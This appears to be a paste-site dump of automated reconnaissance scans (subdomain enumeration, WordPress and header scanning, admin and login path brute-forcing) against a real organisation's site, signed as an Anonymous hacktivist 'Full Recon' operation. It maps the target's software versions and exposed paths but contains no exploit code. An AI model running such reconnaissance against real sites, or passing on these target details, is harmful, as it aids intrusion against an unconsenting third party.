  1873. 51.255.33.229 - elderechohumano.org
  1874. 51.255.33.229 - ftp.elderechohumano.org
  1875. 51.255.33.229 - imap.elderechohumano.org
  1876. 51.255.33.229 - mail.elderechohumano.org
  1877. 51.255.33.229 - ns.elderechohumano.org
  1878. 51.255.33.229 - pop.elderechohumano.org
  1879. 51.255.33.229 - pop3.elderechohumano.org
  1880. 51.255.33.229 - smtp.elderechohumano.org
  1881. 51.255.33.229 - webmail.elderechohumano.org
  1882. 51.255.33.229 - www.elderechohumano.org
  1883.  
  1884. #######################################################################################################################################
  1885. Original* elderechohumano.org 51.255.33.229 NS:sdns2.ovh.net MX:mail.elderechohumano.org
  1886. Subdomain elderecho.humano.org 88.214.194.86
  1887. Subdomain elderechohu.mano.org 69.172.201.153 NS:ns1.uniregistrymarket.link
  1888. Subdomain elderechohum.ano.org 210.249.74.117 NS:ns3.funcy.com MX:ms4.funcy.com
  1889. Subdomain elderechohuman.o.org 50.63.46.1 NS:A.SERVICE.AFILIASDNS.INFO
  1890. #######################################################################################################################################
  1891. Ip Address Status Type Domain Name Server
  1892. ---------- ------ ---- ----------- ------
  1893. 51.255.33.229 200 alias ftp.elderechohumano.org nginx
  1894. 51.255.33.229 200 host elderechohumano.org nginx
  1895. 51.255.33.229 200 host imap.elderechohumano.org nginx
  1896. 51.255.33.229 200 host mail.elderechohumano.org nginx
  1897. 51.255.33.229 200 host ns.elderechohumano.org nginx
  1898. 51.255.33.229 200 host pop.elderechohumano.org nginx
  1899. 51.255.33.229 200 host pop3.elderechohumano.org nginx
  1900. 51.255.33.229 200 host smtp.elderechohumano.org nginx
  1901. 51.255.33.229 302 host webmail.elderechohumano.org nginx
  1902. 51.255.33.229 301 alias www.elderechohumano.org nginx
  1903. 51.255.33.229 301 host elderechohumano.org nginx
  1904. #######################################################################################################################################
  1905. [+] URL: https://elderechohumano.org/web/
  1906. [+] Started: Wed May 23 03:09:38 2018
  1907.  
  1908. [!] The WordPress 'https://elderechohumano.org/web/readme.html' file exists exposing a version number
  1909. [+] Interesting header: LINK: <https://elderechohumano.org/web/wp-json/>; rel="https://api.w.org/", <https://wp.me/P4jvyk-a>; rel=shortlink
  1910. [+] Interesting header: SERVER: nginx
  1911. [+] Interesting header: X-POWERED-BY: PHP/5.6.31
  1912. [+] Interesting header: X-POWERED-BY: PleskLin
  1913. [+] XML-RPC Interface available under: https://elderechohumano.org/web/xmlrpc.php
  1914.  
  1915. [+] WordPress version 4.9.6 (Released on 2018-05-17) identified from readme, links opml, stylesheets numbers, advanced fingerprinting, meta generator
  1916.  
  1917. [+] WordPress theme in use: mantra - v2.6.1.1
  1918.  
  1919. [+] Name: mantra - v2.6.1.1
  1920. | Last updated: 2018-01-22T00:00:00.000Z
  1921. | Location: https://elderechohumano.org/web/wp-content/themes/mantra/
  1922. | Readme: https://elderechohumano.org/web/wp-content/themes/mantra/readme.txt
  1923. [!] The version is out of date, the latest version is 3.0.4
  1924. | Style URL: https://elderechohumano.org/web/wp-content/themes/mantra/style.css
  1925. | Theme Name: Mantra
  1926. | Theme URI: https://www.cryoutcreations.eu/wordpress-themes/mantra
  1927. | Description: Mantra is a do-it-yourself WordPress theme, featuring a pack of over 100 customization options an...
  1928. | Author: Cryout Creations
  1929. | Author URI: https://www.cryoutcreations.eu
  1930.  
  1931. [+] Enumerating plugins from passive detection ...
  1932. | 1 plugin found:
  1933.  
  1934. [+] Name: jetpack - v6.1
  1935. | Last updated: 2018-05-22T21:44:00.000Z
  1936. | Location: https://elderechohumano.org/web/wp-content/plugins/jetpack/
  1937. | Readme: https://elderechohumano.org/web/wp-content/plugins/jetpack/readme.txt
  1938. | Changelog: https://elderechohumano.org/web/wp-content/plugins/jetpack/changelog.txt
  1939. [!] The version is out of date, the latest version is 6.1.1
  1940. #######################################################################################################################################
  1941. --------------------------------------------------------------------------------------------------------------------------------------
  1942. + Target IP: 51.255.33.229
  1943. + Target Hostname: elderechohumano.org
  1944. + Target Port: 443
  1945. ---------------------------------------------------------------------------------------------------------------------------------------
  1946. + SSL Info: Subject: /CN=elderechohumano.org
  1947. Ciphers: ECDHE-RSA-AES128-GCM-SHA256
  1948. Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
  1949. + Start Time: 2018-05-23 03:13:23 (GMT-4)
  1950. ---------------------------------------------------------------------------------------------------------------------------------------
  1951. + Server: nginx
  1952. + Retrieved x-powered-by header: PleskLin
  1953. + The anti-clickjacking X-Frame-Options header is not present.
  1954. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1955. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  1956. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1957. + Root page / redirects to: https://elderechohumano.org/web
  1958. + Server leaks inodes via ETags, header found with file /aOM2omfL.old, fields: 0x405 0x4e40c6af4a100
  1959. + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: : Invalid argument
  1960. + Scan terminated: 20 error(s) and 6 item(s) reported on remote host
  1961. + End Time: 2018-05-23 03:33:49 (GMT-4) (1226 seconds)
  1962. ---------------------------------------------------------------------------------------------------------------------------------------
  1963. #######################################################################################################################################
  1964. ======================================================================================================================================
  1965. | [*] http://elderechohumano.org/ redirected to http://elderechohumano.org/web/
  1966. | [*] New target is: http://elderechohumano.org/web/
  1967. =======================================================================================================================================
  1968. | Domain: http://elderechohumano.org/web/
  1969. | Server: nginx
  1970. | IP: 51.255.33.229
  1971. =======================================================================================================================================
  1972. |
  1973. | Directory check:
  1974. | [+] CODE: 200 URL: http://elderechohumano.org/web/ad/
  1975. | [+] CODE: 200 URL: http://elderechohumano.org/web/admin/
  1976. | [+] CODE: 200 URL: http://elderechohumano.org/web/ap/
  1977. | [+] CODE: 200 URL: http://elderechohumano.org/web/at/
  1978. | [+] CODE: 200 URL: http://elderechohumano.org/web/biblioteca/
  1979. | [+] CODE: 200 URL: http://elderechohumano.org/web/biblio/
  1980. | [+] CODE: 200 URL: http://elderechohumano.org/web/comunicado/
  1981. | [+] CODE: 200 URL: http://elderechohumano.org/web/conf/
  1982. | [+] CODE: 200 URL: http://elderechohumano.org/web/conferen/
  1983. | [+] CODE: 200 URL: http://elderechohumano.org/web/cont/
  1984. | [+] CODE: 200 URL: http://elderechohumano.org/web/conta/
  1985. | [+] CODE: 200 URL: http://elderechohumano.org/web/contact/
  1986. | [+] CODE: 200 URL: http://elderechohumano.org/web/de/
  1987. | [+] CODE: 200 URL: http://elderechohumano.org/web/di/
  1988. | [+] CODE: 200 URL: http://elderechohumano.org/web/embed/
  1989. | [+] CODE: 200 URL: http://elderechohumano.org/web/en/
  1990. | [+] CODE: 200 URL: http://elderechohumano.org/web/enlaces/
  1991. | [+] CODE: 200 URL: http://elderechohumano.org/web/entrevista/
  1992. | [+] CODE: 200 URL: http://elderechohumano.org/web/es/
  1993. | [+] CODE: 200 URL: http://elderechohumano.org/web/espanol/
  1994. | [+] CODE: 200 URL: http://elderechohumano.org/web/esp/
  1995. | [+] CODE: 200 URL: http://elderechohumano.org/web/feed/
  1996. | [+] CODE: 200 URL: http://elderechohumano.org/web/fe/
  1997. | [+] CODE: 200 URL: http://elderechohumano.org/web/historia/
  1998. | [+] CODE: 200 URL: http://elderechohumano.org/web/hist/
  1999. | [+] CODE: 200 URL: http://elderechohumano.org/web/home/
  2000. | [+] CODE: 200 URL: http://elderechohumano.org/web/in/
  2001. | [+] CODE: 200 URL: http://elderechohumano.org/web/inicio/
  2002. | [+] CODE: 200 URL: http://elderechohumano.org/web/int/
  2003. | [+] CODE: 200 URL: http://elderechohumano.org/web/intern/
  2004. | [+] CODE: 200 URL: http://elderechohumano.org/web/interna/
  2005. | [+] CODE: 200 URL: http://elderechohumano.org/web/laicismo/
  2006. | [+] CODE: 200 URL: http://elderechohumano.org/web/log/
  2007. | [+] CODE: 200 URL: http://elderechohumano.org/web/login/
  2008. | [+] CODE: 200 URL: http://elderechohumano.org/web/noticias/
  2009. | [+] CODE: 200 URL: http://elderechohumano.org/web/noticia/
  2010. | [+] CODE: 200 URL: http://elderechohumano.org/web/of/
  2011. | [+] CODE: 200 URL: http://elderechohumano.org/web/po/
  2012. | [+] CODE: 200 URL: http://elderechohumano.org/web/re/
  2013. | [+] CODE: 200 URL: http://elderechohumano.org/web/rss/
  2014. | [+] CODE: 200 URL: http://elderechohumano.org/web/visit/
  2015. | [+] CODE: 200 URL: http://elderechohumano.org/web/wp-admin/
  2016. =======================================================================================================================================
  2017. |
  2018. | File check:
  2019. | [+] CODE: 200 URL: http://elderechohumano.org/web/admin/index.php
  2020. | [+] CODE: 200 URL: http://elderechohumano.org/web/index.php
  2021. | [+] CODE: 200 URL: http://elderechohumano.org/web/license.txt
  2022. | [+] CODE: 200 URL: http://elderechohumano.org/web/readme.html
  2023. | [+] CODE: 200 URL: http://elderechohumano.org/web/search/htx/sqlqhit.asp
  2024. | [+] CODE: 200 URL: http://elderechohumano.org/web/search/htx/SQLQHit.asp
  2025. | [+] CODE: 200 URL: http://elderechohumano.org/web/search/sqlqhit.asp
  2026. | [+] CODE: 200 URL: http://elderechohumano.org/web/search/SQLQHit.asp
  2027. =======================================================================================================================================
  2028. |
  2029. | Check robots.txt:
  2030. |
  2031. | Check sitemap.xml:
  2032. =======================================================================================================================================
  2033. |
  2034. | Crawler Started:
  2035. | Plugin name: phpinfo() Disclosure v.1 Loaded.
  2036. | Plugin name: External Host Detect v.1.2 Loaded.
  2037. | Plugin name: Code Disclosure v.1.1 Loaded.
  2038. | Plugin name: Upload Form Detect v.1.1 Loaded.
  2039. | Plugin name: FCKeditor upload test v.1 Loaded.
  2040. | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
  2041. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  2042. | Plugin name: E-mail Detection v.1.1 Loaded.
  2043. | [+] Crawling finished, 34 URL's found!
  2044. |
  2045. | PHPinfo() Disclosure:
  2046. |
  2047. | External hosts:
  2048. | [+] External Host Found: http://codex.wordpress.org
  2049. | [+] External Host Found: http://planet.wordpress.org
  2050. | [+] External Host Found: http://www.mysql.com
  2051. | [+] External Host Found: https://droit-humain.org
  2052. | [+] External Host Found: http://es.forums.wordpress.org
  2053. | [+] External Host Found: https://fmd.es
  2054. | [+] External Host Found: http://www.elolivoylaacacia.ml
  2055. | [+] External Host Found: https://s0.wp.com
  2056. | [+] External Host Found: http://auzolan.org.es
  2057. | [+] External Host Found: https://wp.me
  2058. | [+] External Host Found: https://wordpress.org
  2059. | [+] External Host Found: http://php.net
  2060. | [+] External Host Found: http://wordpress.org
  2061. | [+] External Host Found: http://httpd.apache.org
  2062. | [+] External Host Found: http://droit-humain.org
  2063. | [+] External Host Found: https://gmpg.org
  2064. | [+] External Host Found: https://auzolan.org.es
  2065. | [+] External Host Found: https://secure.gravatar.com
  2066. #######################################################################################################################################
  2067. Anonymous #OPKilluminatie JTSEC Full Recon #3 2018
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement